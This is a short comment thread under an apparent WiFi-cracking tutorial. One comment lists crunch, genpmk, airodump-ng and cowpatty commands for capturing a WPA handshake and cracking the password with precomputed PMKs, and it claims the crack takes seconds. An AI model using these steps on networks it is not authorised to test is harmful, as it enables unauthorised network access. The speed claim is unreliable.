Haha! I can just picture some of the new people just getting into the scene trying to do this and sparks coming out of their ears hahaha!!
Was a purty good tutorial though, moroaddict! Smile

i was wondering if there were any ways to up the chances of success outside of just "trying again" for a good handshake. i don't have a problem capturing them but getting a good one according to cowpatty is just not working. would it help to add the essid along with the bssid in the airodump script?

---nevermind about the essid option. there obviously is not one in airodump that i see.

Nice article!
Second solution
1)
if you have 2 or 4 cpu's or Cloud you can create your wordlist with Chrunch tool

./crunch 8 8 azmnjk012345678 -o /root/wordlist.lst

Create the PMK's

genpmk -f wordlist.lst -s <network_SSID> -d output.lst

2)
airodump-ng -c 1 --bssid <AP_MAC> -w <PCAP> mon0

cowpatty -f output.lst -s <network_SSID> -r <pcap_file>

WPA/WPA2 crack in a few seconds (50000 PMK/s)because we have create generate PMK's

This is nice, I saw this after the one without the dictionary, They are both really well explained in my opinion. At least to me they are.
